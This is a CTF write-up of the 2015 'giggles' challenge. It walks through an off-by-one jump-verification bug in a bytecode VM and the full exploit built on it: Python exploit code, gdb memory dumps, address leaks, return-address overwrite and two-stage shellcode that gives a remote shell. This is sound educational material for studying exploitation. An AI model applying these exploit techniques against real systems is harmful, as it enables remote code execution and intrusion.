giggles was an exploitation challenge worth 300 points at the “Ghost in the Shellcode” CTF 2015.

We are provided with remote access to some kind of bytecode-based virtual machine and an example client script written in Python to access it. We also get the source code of the server binary, which saves us some tedious reverse engineering.

After establishing a TCP connection with the server, the example client script glues together some byte code:

operations = createOperation(OP_ADD, 4, 0, 0)
operations += createOperation(OP_ADD, 2, 3, 0)
operations += createOperation(OP_BGT, 0, 1, 2)
operations += createOperation(OP_OUT, 4, 0, 0)

Looking at the server code, the VM supports 7 different instructions:

  • OP_ADD(dest, src) adds the value of register src to that of register dest
  • OP_MOV(dest, src) sets the value of register dest to that of register src
  • OP_OUT(reg) sends the value of register reg over the network to the client
  • OP_BEQ/OP_GT(jmp_target, reg1, reg2) are conditional jumps to instruction jmp_target that are taken when the value of reg1 is equal to / greater than that of reg2, respectively
  • OP_BR(jmp_target) is a conditional jump to instruction 0.
  • OP_EXIT() leaves the function

This is the representation of an instruction in the server:

struct __attribute__ ((__packed__)) operation
{
    uint16_t opcode;
    uint64_t operand1;
    uint64_t operand2;
    uint64_t operand3;
};

The example script then proceeds to send the byte code to the server and register it as a function using the ADDFUNC command:

function = createFunction(4, 2, operations)

We note that 2 is specified as the number of function parameters. This is however wrong, actually 4 arguments are provided when the function is called later. In fact the value provided here is totally ignored by the server.

The corresponding handler on the server side adds the function to a global array of function structures:

struct __attribute__ ((__packed__)) function
{
    uint16_t num_ops;
    uint16_t num_args;
    uint8_t verified;
    struct operation bytecode[MAX_OPS];
};
uint32_t num_funcs = 0;
struct function funcs[MAX_FUNCS];

Initially the instructions are just copied verbatim from the client, but the function is marked as unverified, so it cannot be called yet. To mark it as verified, the example client explicity calls the VERIFY command with the index of the function as an argument:

verifyFunction(sockfd, 0)

The server then checks the bytecode in an attempt to prevent out-of-bounds operands, but fails to do so (more on this later). It then marks the function as verified and we can call it:

# this will output 12, the result of 3 * 4
print int(runFunction(sockfd, 0, [3, 4, 0, 1]), 16)

Great, so know we have a basic idea of what the protocol is and what the VM can do. Let’s exploit it.

The bug

As mentioned, the verifyBytecode function is buggy:

    for (i = 0; i < n_ops; i++)
    {
        switch (bytecode[i].opcode)
        {
            // [...]
            case OP_BR:
                if (bytecode[i].operand1 > n_ops)
                    return 0;
                break;
            // [...]
        }
    }

There is an off-by-one error: If the operand is equal to n_ops, the jump is allowed although the target instruction is out of range. We can exploit this by defining a function with MAX_OPS instructions and have it jump to MAX_OPS. The program counter will then end up in the header of the following function. We just have to construct a function header that is also a valid, useful instruction.

The exploit

Our plan now is to construct a function that is also a valid jump instruction. The memory layouts of the two structures compare as follows:

interpreted as function:
+--------------+--------------+--------------+--------------+----------+------
| num_ops (16) | num_args(16) | verified (8) | op_code (16) | op1 (64) | ...
+--------------+--------------+--------------+--------------+----------+------

interpreted as jump instruction:
+--------------+-------------------------------------------------+------
| OP_BR (16)   | jump target (64)                                | ...
+--------------+-------------------------------------------------+------

We can easily set num_ops = OP_BR, which happens to have the value 1. The jump target is pretty much arbitrary, since num_args is ignored and we can control it. We only have to make sure that there is a null byte in the correct position, because verified = 0 is set by the server.

Here is the code to create our trampoline function and function/instruction polyglot:

operations = ""
for _ in xrange(30):
    operations += createOperation(OP_BR, 30, 0, 0)
trampoline_func = createFunction(30, 0, operations)
addFunction(sockfd, trampoline_func)
verifyFunction(sockfd, 0)

s = struct.pack("<HQ", 1, jmp_target) + "A"*5
num_ops, num_args, verified, opcode, op1 = struct.unpack("<HHBHQ", s)
assert num_ops == OP_BR
assert verified == 0

polyglot_func = createFunction(num_ops, num_args, createOperation(opcode, op1, 0, 0))
addFunction(sockfd, polyglot_func)

Now the tedious part is figuring out where to jump. We decided to just jump into an unverified function that we define later, so we get to execute arbitrary bytecode without bounds checking. The problem is that an instruction structure is 26 bytes in size and a function structure 5 + 30 · 26 = 785 bytes, so it is not obvious how to align the instructions properly. We can use as many functions as we want as padding (as soon as there are less than MAX_FUNCS, which is set generously to 64). The offset the first instruction of function X is 785 · X + 5. The offset of the Yth instruction of the first function is 5 + 26 · Y. We need to equate the two:

785 · X + 5 = 5 + 26 · Y

The solution with the smallest positive X is X = 26 and Y = 785. So we have to add 24 functions as padding and we need to jump to instruction 785. This is the setup code that makes a connection and adds all the boilerplate functions:

def preamble():
    #sockfd = socket.create_connection(('localhost', 1423))
    sockfd = socket.create_connection(('giggles.2015.ghostintheshellcode.com', 1423))

    ins_size = 2 + 3*8
    func_size = 2 + 2 + 1 + 30*ins_size
    jmp_target = func_size

    # add the initial, verified function with out of bounds jump
    operations = ""
    for _ in xrange(30):
        operations += createOperation(OP_BR, 30, 0, 0)
    trampoline_func = createFunction(30, 0, operations)
    addFunction(sockfd, trampoline_func)
    verifyFunction(sockfd, 0)

    # add polyglot function
    s = struct.pack("<HQ", 1, jmp_target) + "A"*5
    num_ops, num_args, verified, opcode, op1 = struct.unpack("<HHBHQ", s)
    assert num_ops == OP_BR
    assert verified == 0

    polyglot_func = createFunction(num_ops, num_args, createOperation(opcode, op1, 0, 0))
    addFunction(sockfd, polyglot_func)

    # padding
    for _ in xrange(ins_size - 2):
        addFunction(sockfd, createFunction(1,0,createOperation(0,0,0,0)))

    return sockfd

The function we add after this is the one that is going to get called eventually if we call the first function. Now we can run arbitrary bytecode! E.g., here is a function that reads the wth register value, without bounds checking:

def read_relative(w):
    sockfd = preamble()
    operations = createOperation(OP_OUT, w+1, 0, 0)
    operations += createOperation(OP_OUT, w, 0, 0)
    addFunction(sockfd, createFunction(2, 0, operations))
    s = runFunction(sockfd, 0, [])
    return int("".join(s.split()), 16)

It actually uses two OP_OUT instructions to read a 64-bit value. This will basically return *(uint64_t*)(registers + w). To verify that this works, we can run the server in a debugger. We had to NOP out a call to alarm to avoid being interrupted while debugging. This shows a call to read_relative(1337):

$ gdb -p 4077 ./giggles
...
(gdb) set follow-fork-mode child
(gdb) break giggles.c:121
Breakpoint 1 at 0x7f19ed08597e: file giggles.c, line 121.
(gdb) c
Continuing.
[New process 4230]
[Switching to process 4230]

Breakpoint 1, executeFunction (f=0x7f19ed287180 <funcs>, ...
warning: Source file is more recent than executable.
121	        switch (curr_op->opcode)
(gdb) p *curr_op
$1 = {opcode = 1, operand1 = 30, operand2 = 0, operand3 = 0}
(gdb) c
Continuing.

Breakpoint 1, executeFunction (f=0x7f19ed287180 <funcs>, ...
121	        switch (curr_op->opcode)
(gdb) p *curr_op
$2 = {opcode = 1, operand1 = 785, operand2 = 280267669825,
operand3 = 0}
(gdb) c
Continuing.

Breakpoint 1, executeFunction (f=0x7f19ed287180 <funcs>, ...
121	        switch (curr_op->opcode)
(gdb) p *curr_op
$3 = {opcode = 5, operand1 = 1338, operand2 = 0, operand3 = 0}
(gdb) c
Continuing.

Breakpoint 1, executeFunction (f=0x7f19ed287180 <funcs>, ...
121	        switch (curr_op->opcode)
(gdb) p *curr_op
$4 = {opcode = 5, operand1 = 1337, operand2 = 0, operand3 = 0}
(gdb)

Clearly the operands are out of bounds. At this point we have an arbitrary read and write (via OP_MOV) relative to the registers array. Turning this into an absolute read/write is easy too, if we can leak the address of the registers array. Conveniently, it is located on the stack and we can determine its exact location from the value of the saved frame pointer:

(gdb) x/20gx registers
0x7fff59040d90:	0x0000000000000000	0x0000000000000000
0x7fff59040da0:	0x0000000000000000	0x0000000000000000
0x7fff59040db0:	0x0000000000000000	0x00007f19ed0855d8
0x7fff59040dc0:	0x00007fff59002030	0x0000000000000004
0x7fff59040dd0:	0x00007f19ee744574	0x65b948277f4f3b00
0x7fff59040de0:	0x0000000000000000	0x0000000000000000
0x7fff59040df0:	0x00007fff59040e50 <--  0x00007f19ed085efd
0x7fff59040e00:	0x00007f19ed08611c	0x0000000400000000
0x7fff59040e10:	0x00000000000402ed	0x00007f19ee744570
0x7fff59040e20:	0x00007f19ee7445c0	0x00007f19ee744570
(gdb) p 0x00007fff59040e50 - 0x7fff59040d90
$6 = 192

So let’s compute the address of the register array and, while we’re at it, let’s also read the saved return address to compute the base address of our binary:

register_base = read_relative(24) - 192
print "[*] register base =", hex(register_base)
exe_base = read_relative(26) - 0x1efd
print "[*] exe base =", hex(exe_base)

Now we can calculate the offset of arbitrary addresses, relative to registers:

def calc_abs(addr):
    assert (addr - register_base) % 4 == 0
    return ((addr - register_base) / 4) % (2**64)

At this point we thank the authors of the challenge for this nice gimmick:

void * JIT;     // TODO: add code to JIT functions
int handleConnection(int sockfd)
{
    void * value = 0;
    JIT = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    // [...]

This buffer is where we want to store our shellcode. To do that, we read the value of the pointer JIT, which is located in the .bss segment of the binary. We then use a sequence of OP_MOVs to overwrite the buffer and the return address:

jit_ptr = 0x20f5c0
buf = read_relative(calc_abs(exe_base + jit_ptr))
print "[*] jit buffer =", hex(buf)

assert len(stage1) == 28
operations = [
    # overwrite ret addr
    createOperation(OP_MOV, 26, 0, 0),
    createOperation(OP_MOV, 27, 1, 0)
]
# write shellcode
for i in xrange(7):
    operations.append(createOperation(OP_MOV, calc_abs(buf+4*i), 2+i, 0))
operations += [
    createOperation(OP_EXIT, 0, 0, 0),
]

addFunction(sockfd, createFunction(len(operations), 0, "".join(operations)))
args = [buf&0xffffffff, buf>>32] + list(struct.unpack("IIIIIII", stage1))
runFunction(sockfd, 0, args, wait=0)

The way function arguments work in our little VM is that they are copied verbatim into the registers before the function executes. I.e. argument 0 goes into register 0 etc. It is slightly annoying that we have only 9 arguments that we can pass, so our stage 1 shellcode can only have 28 bytes. We use a read syscall to load stage 2 right after stage1:

stage1 = x86_64.assemble("""
    push 4   ; this is the socket fd
    pop rdi
    mov rsi, {buf}
    push 0xff
    pop rdx
    mov rax, 0
    syscall
    """.format(buf=buf+28))
stage1 += "\x90"*(28 - len(stage1))

And we choose to also reuse the socket file descriptor for our final shell:

stage2 = (
    # this code just calls dup2(rdi,0); dup2(rdi,1); dup2(rdi,2)
    x86_64_shellcode.dup2_rdi +
    # and then spawns a shell
    x86_64_shellcode.shell
)
assert len(stage2) <= 0xff

The final exploit in action:

$ python2 exploit.py
[*] register base = 0x7fffb7b91900
[*] exe base = 0x7fef16437000
[*] jit buffer = 0x7fef16431000
[*] Enjoy your shell :)
ls
client.py
giggles
giggles.c
key
cat key
I can't think of anything creative to put in here right now

And yes, it used to give you the flag during the contest :)